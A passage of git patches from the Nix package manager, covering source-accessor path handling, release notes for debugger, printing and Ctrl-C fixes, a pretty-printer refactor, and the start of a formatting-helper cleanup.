-60,7 +89,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa } std::optional st{std::in_place}; - if (::lstat(path.c_str(), &*st)) { + if (::lstat(makeAbsPath(path).c_str(), &*st)) { if (errno == ENOENT || errno == ENOTDIR) st.reset(); else @@ -95,7 +124,7 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & { assertNoSymlinks(path); DirEntries res; - for (auto & entry : nix::readDirectory(path.abs())) { + for (auto & entry : nix::readDirectory(makeAbsPath(path))) { std::optional type; switch (entry.type) { case DT_REG: type = Type::tRegular; break; @@ -110,12 +139,12 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & std::string PosixSourceAccessor::readLink(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - return nix::readLink(path.abs()); + return nix::readLink(makeAbsPath(path)); } -std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & path) +std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & path) { - return path; + return makeAbsPath(path); } void PosixSourceAccessor::assertNoSymlinks(CanonPath path) diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index b2bd39805..717c8f017 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -9,6 +9,16 @@ namespace nix { */ struct PosixSourceAccessor : virtual SourceAccessor { + /** + * Optional root path to prefix all operations into the native file + * system. This allows prepending funny things like `C:\` that + * `CanonPath` intentionally doesn't support. + */ + const std::filesystem::path root; + + PosixSourceAccessor(); + PosixSourceAccessor(std::filesystem::path && root); + /** * The most recent mtime seen by lstat(). This is a hack to * support dumpPathAndGetMtime(). Should remove this eventually. @@ -28,7 +38,22 @@ struct PosixSourceAccessor : virtual SourceAccessor std::string readLink(const CanonPath & path) override; - std::optional getPhysicalPath(const CanonPath & path) override; + std::optional getPhysicalPath(const CanonPath & path) override; + + /** + * Create a `PosixSourceAccessor` and `CanonPath` corresponding to + * some native path. + * + * The `PosixSourceAccessor` is rooted as far up the tree as + * possible, (e.g. on Windows it could scoped to a drive like + * `C:\`). This allows more `..` parent accessing to work. + * + * See + * [`std::filesystem::path::root_path`](https://en.cppreference.com/w/cpp/filesystem/path/root_path) + * and + * [`std::filesystem::path::relative_path`](https://en.cppreference.com/w/cpp/filesystem/path/relative_path). + */ + static std::pair createAtRoot(const std::filesystem::path & path); private: @@ -38,6 +63,8 @@ private: void assertNoSymlinks(CanonPath path); std::optional cachedLstat(const CanonPath & path); + + std::filesystem::path makeAbsPath(const CanonPath & path); }; } diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 4f4ff09c1..aff7da09c 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -1,5 +1,7 @@ #pragma once +#include + #include "canon-path.hh" #include "hash.hh" @@ -119,7 +121,7 @@ struct SourceAccessor * possible. This is only possible for filesystems that are * materialized in the root filesystem. */ - virtual std::optional getPhysicalPath(const CanonPath & path) + virtual std::optional getPhysicalPath(const CanonPath & path) { return std::nullopt; } bool operator == (const SourceAccessor & x) const diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc index 341daf39c..0f154e779 100644 --- a/src/libutil/source-path.cc +++ b/src/libutil/source-path.cc @@ -35,7 +35,7 @@ void SourcePath::dumpPath( PathFilter & filter) const { return accessor->dumpPath(path, sink, filter); } -std::optional SourcePath::getPhysicalPath() const +std::optional SourcePath::getPhysicalPath() const { return accessor->getPhysicalPath(path); } std::string SourcePath::to_string() const diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh index bde07b08f..a2f4ddd1e 100644 --- a/src/libutil/source-path.hh +++ b/src/libutil/source-path.hh @@ -82,7 +82,7 @@ struct SourcePath * Return the location of this path in the "real" filesystem, if * it has a physical location. */ - std::optional getPhysicalPath() const; + std::optional getPhysicalPath() const; std::string to_string() const; diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 549adfbf7..a372e4b1c 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -299,7 +299,7 @@ static void main_nix_build(int argc, char * * argv) else for (auto i : left) { if (fromArgs) - exprs.push_back(state->parseExprFromString(std::move(i), state->rootPath(CanonPath::fromCwd()))); + exprs.push_back(state->parseExprFromString(std::move(i), state->rootPath("."))); else { auto absolute = i; try { @@ -400,7 +400,7 @@ static void main_nix_build(int argc, char * * argv) try { auto expr = state->parseExprFromString( "(import {}).bashInteractive", - state->rootPath(CanonPath::fromCwd())); + state->rootPath(".")); Value v; state->eval(expr, v); diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index dfc6e70eb..1f311733b 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -413,7 +413,7 @@ static void queryInstSources(EvalState & state, loadSourceExpr(state, *instSource.nixExprPath, vArg); for (auto & i : args) { - Expr * eFun = state.parseExprFromString(i, state.rootPath(CanonPath::fromCwd())); + Expr * eFun = state.parseExprFromString(i, state.rootPath(".")); Value vFun, vTmp; state.eval(eFun, vFun); vTmp.mkApp(&vFun, &vArg); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index b9e626aed..86e6f008d 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -168,7 +168,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { auto p = state->findFile(i); if (auto fn = p.getPhysicalPath()) - std::cout << fn->abs() << std::endl; + std::cout << fn->native() << std::endl; else throw Error("'%s' has no physical path", p); } @@ -184,7 +184,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { Expr * e = fromArgs - ? state->parseExprFromString(i, state->rootPath(CanonPath::fromCwd())) + ? state->parseExprFromString(i, state->rootPath(".")) : state->parseExprFromFile(resolveExprPath(lookupFileArg(*state, i))); processExpr(*state, attrPaths, parseOnly, strict, autoArgs, evalOnly, outputKind, xmlOutputSourceLocation, e); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 40378e123..f6a36da0d 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -176,12 +176,11 @@ static void opAdd(Strings opFlags, Strings opArgs) { if (!opFlags.empty()) throw UsageError("unknown flag"); - PosixSourceAccessor accessor; - for (auto & i : opArgs) + for (auto & i : opArgs) { + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(i); cout << fmt("%s\n", store->printStorePath(store->addToStore( - std::string(baseNameOf(i)), - accessor, - CanonPath::fromCwd(i)))); + std::string(baseNameOf(i)), accessor, canonPath))); + } } @@ -201,14 +200,15 @@ static void opAddFixed(Strings opFlags, Strings opArgs) HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); - PosixSourceAccessor accessor; - for (auto & i : opArgs) + for (auto & i : opArgs) { + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(i); std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow( baseNameOf(i), accessor, - CanonPath::fromCwd(i), + canonPath, method, hashAlgo).path)); + } } diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 7c534517d..d3e66dc21 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -60,9 +60,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand { if (!namePart) namePart = baseNameOf(path); - PosixSourceAccessor accessor; - - auto path2 = CanonPath::fromCwd(path); + auto [accessor, path2] = PosixSourceAccessor::createAtRoot(path); auto storePath = dryRun ? store->computeStorePath( diff --git a/src/nix/eval.cc b/src/nix/eval.cc index a89fa7412..31b2ccd3c 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -66,7 +66,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption if (apply) { auto vApply = state->allocValue(); - state->eval(state->parseExprFromString(*apply, state->rootPath(CanonPath::fromCwd())), *vApply); + state->eval(state->parseExprFromString(*apply, state->rootPath(".")), *vApply); auto vRes = state->allocValue(); state->callFunction(*vApply, *v, *vRes, noPos); v = vRes; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 4837891c6..eec1c0eae 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -89,8 +89,8 @@ struct CmdHashBase : Command else hashSink = std::make_unique(ha); - PosixSourceAccessor accessor; - dumpPath(accessor, CanonPath::fromCwd(path), *hashSink, mode); + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); + dumpPath(accessor, canonPath, *hashSink, mode); Hash h = hashSink->finish().first; if (truncate && h.hashSize > 20) h = compressHash(h, 20); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 84b79ea28..6e3f878d9 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -123,10 +123,9 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(tmpFile); auto info = store->addToStoreSlow( - *name, - accessor, CanonPath::fromCwd(tmpFile), + *name, accessor, canonPath, ingestionMethod, hashAlgo, {}, expectedHash); storePath = info.path; assert(info.ca); From 754c35abfbed653492859136cd41a80b38009e27 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:05 -0800 Subject: [PATCH 414/654] Add release notes for "Debugger prints source position information" --- doc/manual/rl-next/debugger-positions.md | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 doc/manual/rl-next/debugger-positions.md diff --git a/doc/manual/rl-next/debugger-positions.md b/doc/manual/rl-next/debugger-positions.md new file mode 100644 index 000000000..2fe868413 --- /dev/null +++ b/doc/manual/rl-next/debugger-positions.md @@ -0,0 +1,25 @@ +--- +synopsis: Debugger prints source position information +prs: 9913 +--- + +The `--debugger` now prints source location information, instead of the +pointers of source location information. Before: + +``` +nix-repl> :bt +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +0x600001522598 +``` + +After: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27 + + 131| + 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs; + | ^ + 133| in +``` From 9a5d52262fd83ab11cb36ba2ba91ea27b2389670 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:31 -0800 Subject: [PATCH 415/654] Add release notes for "Nix no longer attempts to `git add` files that are `.gitignore`d" --- doc/manual/src/release-notes/rl-2.20.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 26869e90a..5152926e7 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -167,3 +167,7 @@ error: expected a set but found an integer ``` +- Flake operations like `nix develop` will no longer fail when run in a Git + repository where the `flake.lock` file is `.gitignore`d + [#8854](https://github.com/NixOS/nix/issues/8854) + [#9324](https://github.com/NixOS/nix/pull/9324) From abb5fef355afc14819c96de08a3687c2257bd10c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:58 -0800 Subject: [PATCH 416/654] Add release notes for "Functions are printed with more detail" --- doc/manual/rl-next/lambda-printing.md | 50 +++++++++++++++++++++++++ doc/manual/src/release-notes/rl-2.20.md | 19 ++++++++++ 2 files changed, 69 insertions(+) create mode 100644 doc/manual/rl-next/lambda-printing.md diff --git a/doc/manual/rl-next/lambda-printing.md b/doc/manual/rl-next/lambda-printing.md new file mode 100644 index 000000000..3a63f3068 --- /dev/null +++ b/doc/manual/rl-next/lambda-printing.md @@ -0,0 +1,50 @@ +--- +synopsis: Functions are printed with more detail +prs: 9606 +issues: 7145 +--- + +Functions and `builtins` are printed with more detail in `nix repl`, `nix +eval`, `builtins.trace`, and most other places values are printed. + +Before: + +``` +$ nix repl nixpkgs +nix-repl> builtins.map +«primop» + +nix-repl> builtins.map lib.id +«primop-app» + +nix-repl> builtins.trace lib.id "my-value" +trace: +"my-value" + +$ nix eval --file functions.nix +{ id = ; primop = ; primop-app = ; } +``` + +After: + +``` +$ nix repl nixpkgs +nix-repl> builtins.map +«primop map» + +nix-repl> builtins.map lib.id +«partially applied primop map» + +nix-repl> builtins.trace lib.id "my-value" +trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5» +"my-value" + +$ nix eval --file functions.nix +{ id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; } +``` + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. + +[type-error]: https://github.com/NixOS/nix/pull/9753 +[coercion-error]: https://github.com/NixOS/nix/pull/9754 diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 5152926e7..666d0b4db 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -167,6 +167,25 @@ error: expected a set but found an integer ``` + +- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606) + + `nix repl`, `nix eval`, `builtins.trace`, and most other places values are + printed will now include function names and source location information: + + ``` + $ nix repl nixpkgs + nix-repl> builtins.map + «primop map» + + nix-repl> builtins.map lib.id + «partially applied primop map» + + nix-repl> builtins.trace lib.id "my-value" + trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5» + "my-value" + ``` + - Flake operations like `nix develop` will no longer fail when run in a Git repository where the `flake.lock` file is `.gitignore`d [#8854](https://github.com/NixOS/nix/issues/8854) From 24cdb81bb043a156346dd9e235e66889567c5fdc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:14 -0800 Subject: [PATCH 417/654] Add release notes for "Nix commands respect Ctrl-C" --- doc/manual/rl-next/more-commands-respect-ctrl-c.md | 13 +++++++++++++ doc/manual/src/release-notes/rl-2.20.md | 10 ++++++++++ 2 files changed, 23 insertions(+) create mode 100644 doc/manual/rl-next/more-commands-respect-ctrl-c.md diff --git a/doc/manual/rl-next/more-commands-respect-ctrl-c.md b/doc/manual/rl-next/more-commands-respect-ctrl-c.md new file mode 100644 index 000000000..948930c96 --- /dev/null +++ b/doc/manual/rl-next/more-commands-respect-ctrl-c.md @@ -0,0 +1,13 @@ +--- +synopsis: Nix commands respect Ctrl-C +prs: 9687 6995 +issues: 7245 +--- + +Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed +while performing various operations (including `nix develop`, `nix flake +update`, and so on). With several fixes to Nix's signal handlers, Nix commands +will now exit quickly after Ctrl-C is pressed. + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 666d0b4db..8ede168a4 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -190,3 +190,13 @@ repository where the `flake.lock` file is `.gitignore`d [#8854](https://github.com/NixOS/nix/issues/8854) [#9324](https://github.com/NixOS/nix/pull/9324) + +- Nix commands will now respect Ctrl-C + [#7145](https://github.com/NixOS/nix/issues/7145) + [#6995](https://github.com/NixOS/nix/pull/6995) + [#9687](https://github.com/NixOS/nix/pull/9687) + + Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed + while performing various operations (including `nix develop`, `nix flake + update`, and so on). With several fixes to Nix's signal handlers, Nix + commands will now exit quickly after Ctrl-C is pressed. From 4f0d43a397205c185eea81e553e30fefc2c0d9f5 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:28 -0800 Subject: [PATCH 418/654] Add release notes for "`nix repl` now respects Ctrl-C while printing values" --- doc/manual/rl-next/repl-ctrl-c-while-printing.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 doc/manual/rl-next/repl-ctrl-c-while-printing.md diff --git a/doc/manual/rl-next/repl-ctrl-c-while-printing.md b/doc/manual/rl-next/repl-ctrl-c-while-printing.md new file mode 100644 index 000000000..15b0daa0a --- /dev/null +++ b/doc/manual/rl-next/repl-ctrl-c-while-printing.md @@ -0,0 +1,8 @@ +--- +synopsis: "`nix repl` now respects Ctrl-C while printing values" +prs: 9927 +--- + +`nix repl` will now halt immediately when Ctrl-C is pressed while it's printing +a value. This is useful if you got curious about what would happen if you +printed all of Nixpkgs. From 837c350bcd36f51d656fdb3bf1c40bce398181b0 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:46 -0800 Subject: [PATCH 419/654] Add release notes for "Cycle detection in `nix repl` is simpler and more reliable" --- doc/manual/rl-next/repl-cycle-detection.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 doc/manual/rl-next/repl-cycle-detection.md diff --git a/doc/manual/rl-next/repl-cycle-detection.md b/doc/manual/rl-next/repl-cycle-detection.md new file mode 100644 index 000000000..de24c4be1 --- /dev/null +++ b/doc/manual/rl-next/repl-cycle-detection.md @@ -0,0 +1,22 @@ +--- +synopsis: Cycle detection in `nix repl` is simpler and more reliable +prs: 9926 +issues: 8672 +--- + +The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere +else values are printed is now simpler and matches the cycle detection in +`nix-instantiate --eval` output. + +Before: + +``` +nix eval --expr 'let self = { inherit self; }; in self' +{ self = { self = «repeated»; }; } +``` + +After: + +``` +{ self = «repeated»; } +``` From 7f8960d0f29991d6df8320059378d67530b45c50 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:35:06 -0800 Subject: [PATCH 420/654] Add release notes for "Stack size is increased on macOS" --- doc/manual/rl-next/stack-size-macos.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/stack-size-macos.md diff --git a/doc/manual/rl-next/stack-size-macos.md b/doc/manual/rl-next/stack-size-macos.md new file mode 100644 index 000000000..b1c40bb5a --- /dev/null +++ b/doc/manual/rl-next/stack-size-macos.md @@ -0,0 +1,9 @@ +--- +synopsis: Stack size is increased on macOS +prs: 9860 +--- + +Previously, Nix would set the stack size to 64MiB on Linux, but would leave the +stack size set to the default (approximately 8KiB) on macOS. Now, the stack +size is correctly set to 64MiB on macOS as well, which should reduce stack +overflow segfaults in deeply-recursive Nix expressions. From b2868acbdc125bf3638f21dd8c5684cc56d4b739 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:35:21 -0800 Subject: [PATCH 421/654] Add release notes for "Stack traces are more compact" --- .../rl-next/stack-traces-are-more-compact.md | 51 +++++++++++++++++++ doc/manual/src/release-notes/rl-2.20.md | 19 +++++++ 2 files changed, 70 insertions(+) create mode 100644 doc/manual/rl-next/stack-traces-are-more-compact.md diff --git a/doc/manual/rl-next/stack-traces-are-more-compact.md b/doc/manual/rl-next/stack-traces-are-more-compact.md new file mode 100644 index 000000000..751465da1 --- /dev/null +++ b/doc/manual/rl-next/stack-traces-are-more-compact.md @@ -0,0 +1,51 @@ +--- +synopsis: Stack traces are more compact +prs: 9619 +--- + +Stack traces printed with `--show-trace` are more compact. + +Before: + +``` +error: + … while evaluating the attribute 'body' + + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| +``` + +After: + +``` +error: + … while evaluating the attribute 'body' + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| +``` + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 8ede168a4..4dd49c5ea 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -200,3 +200,22 @@ while performing various operations (including `nix develop`, `nix flake update`, and so on). With several fixes to Nix's signal handlers, Nix commands will now exit quickly after Ctrl-C is pressed. + +- Blank lines have been removed from stack traces, rendering them more compact [#9619](https://github.com/NixOS/nix/pull/9619) + + ``` + error: + … while evaluating the attribute 'body' + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| + ``` From 0f1269243b242be033ff031ab1993e05cf25d857 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:09:47 -0800 Subject: [PATCH 422/654] Revert "Add release notes for "Stack traces are more compact"" This reverts commit b2868acbdc125bf3638f21dd8c5684cc56d4b739. --- .../rl-next/stack-traces-are-more-compact.md | 51 ------------------- doc/manual/src/release-notes/rl-2.20.md | 19 ------- 2 files changed, 70 deletions(-) delete mode 100644 doc/manual/rl-next/stack-traces-are-more-compact.md diff --git a/doc/manual/rl-next/stack-traces-are-more-compact.md b/doc/manual/rl-next/stack-traces-are-more-compact.md deleted file mode 100644 index 751465da1..000000000 --- a/doc/manual/rl-next/stack-traces-are-more-compact.md +++ /dev/null @@ -1,51 +0,0 @@ ---- -synopsis: Stack traces are more compact -prs: 9619 ---- - -Stack traces printed with `--show-trace` are more compact. - -Before: - -``` -error: - … while evaluating the attribute 'body' - - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| -``` - -After: - -``` -error: - … while evaluating the attribute 'body' - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| -``` - -This was actually released in Nix 2.20, but wasn't added to the release notes -so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 4dd49c5ea..8ede168a4 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -200,22 +200,3 @@ while performing various operations (including `nix develop`, `nix flake update`, and so on). With several fixes to Nix's signal handlers, Nix commands will now exit quickly after Ctrl-C is pressed. - -- Blank lines have been removed from stack traces, rendering them more compact [#9619](https://github.com/NixOS/nix/pull/9619) - - ``` - error: - … while evaluating the attribute 'body' - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| - ``` From a27651908fc1b5ef73a81e46434a408c5868fa7b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:11:45 -0800 Subject: [PATCH 423/654] Add assertion for decreasing the indent MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com> --- src/libexpr/print.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 1ff026b3d..cdc9f6dbe 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -176,6 +176,7 @@ private: void decreaseIndent() { if (options.prettyPrint()) { + assert(indent.size() >= options.prettyIndent); indent.resize(indent.size() - options.prettyIndent); } } From 1c5f5d4291df7bf80806e57c75d2ec67bced8616 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:17:20 -0800 Subject: [PATCH 424/654] `prettyPrint` -> `shouldPrettyPrint` --- src/libexpr/print-options.hh | 2 +- src/libexpr/print.cc | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index 94767df9c..6c5e80c61 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -71,7 +71,7 @@ struct PrintOptions /** * True if pretty-printing is enabled. */ - inline bool prettyPrint() + inline bool shouldPrettyPrint() { return prettyIndent > 0; } diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index cdc9f6dbe..a8eac8288 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -168,14 +168,14 @@ private: void increaseIndent() { - if (options.prettyPrint()) { + if (options.shouldPrettyPrint()) { indent.append(options.prettyIndent, ' '); } } void decreaseIndent() { - if (options.prettyPrint()) { + if (options.shouldPrettyPrint()) { assert(indent.size() >= options.prettyIndent); indent.resize(indent.size() - options.prettyIndent); } @@ -279,7 +279,7 @@ private: bool shouldPrettyPrintAttrs(AttrVec & v) { - if (!options.prettyPrint() || v.empty()) { + if (!options.shouldPrettyPrint() || v.empty()) { return false; } @@ -356,7 +356,7 @@ private: bool shouldPrettyPrintList(std::span list) { - if (!options.prettyPrint() || list.empty()) { + if (!options.shouldPrettyPrint() || list.empty()) { return false; } From 403c90ddf58a3f16a44dfe1f20004b6baa4e5ce2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:17:33 -0800 Subject: [PATCH 425/654] Extract `printSpace` helper --- src/libexpr/print.cc | 39 +++++++++++++++++++-------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index a8eac8288..5605aad28 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -181,6 +181,21 @@ private: } } + /** + * Print a space (for separating items or attributes). + * + * If pretty-printing is enabled, a newline and the current `indent` is + * printed instead. + */ + void printSpace(bool prettyPrint) + { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + } + void printRepeated() { if (options.ansiColors) @@ -324,11 +339,7 @@ private: auto prettyPrint = shouldPrettyPrintAttrs(sorted); for (auto & i : sorted) { - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); @@ -343,11 +354,7 @@ private: } decreaseIndent(); - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); output << "}"; } else { output << "{ ... }"; @@ -389,11 +396,7 @@ private: auto listItems = v.listItems(); auto prettyPrint = shouldPrettyPrintList(listItems); for (auto elem : listItems) { - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); if (listItemsPrinted >= options.maxListItems) { printElided(listItems.size() - listItemsPrinted, "item", "items"); @@ -409,11 +412,7 @@ private: } decreaseIndent(); - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); output << "]"; } else { output << "[ ... ]"; From 149bd63afb30c5ae58eb3cc03fc208f89547cc16 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:16:30 -0800 Subject: [PATCH 426/654] Cleanup `fmt.hh` When I started contributing to Nix, I found the mix of definitions and names in `fmt.hh` to be rather confusing, especially the small difference between `hintfmt` and `hintformat`. I've renamed many classes and added documentation to most definitions. - `formatHelper` is no longer exported. - `fmt`'s documentation is now with `fmt` rather than (misleadingly) above `formatHelper`. - `yellowtxt` is renamed to `Magenta`. `yellowtxt` wraps its value with `ANSI_WARNING`, but `ANSI_WARNING` has been equal to `ANSI_MAGENTA` for a long time. Now the name is updated. - `normaltxt` is renamed to `Uncolored`. - `hintfmt` has been merged into `hintformat` as extra constructor functions. - `hintformat` has been renamed to `hintfmt`. - The single-argument `hintformat(std::string)` constructor has been renamed to a static member `hintformat::interpolate` to avoid pitfalls with using user-generated strings as format strings. --- src/build-remote/build-remote.cc | 2 +- src/libexpr/eval.hh | 2 +- src/libexpr/value/context.hh | 2 +- src/libstore/build/derivation-goal.cc | 8 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/filetransfer.cc | 2 +- src/libstore/sqlite.cc | 6 +- src/libstore/sqlite.hh | 6 +- src/libutil/error.cc | 4 +- src/libutil/error.hh | 10 +- src/libutil/fmt.hh | 157 +++++++++++++------- src/libutil/logging.hh | 11 ++ tests/unit/libexpr/error_traces.cc | 1 - tests/unit/libutil/logging.cc | 2 +- 14 files changed, 135 insertions(+), 80 deletions(-) diff --git a/src/build-remote/build-remote.cc 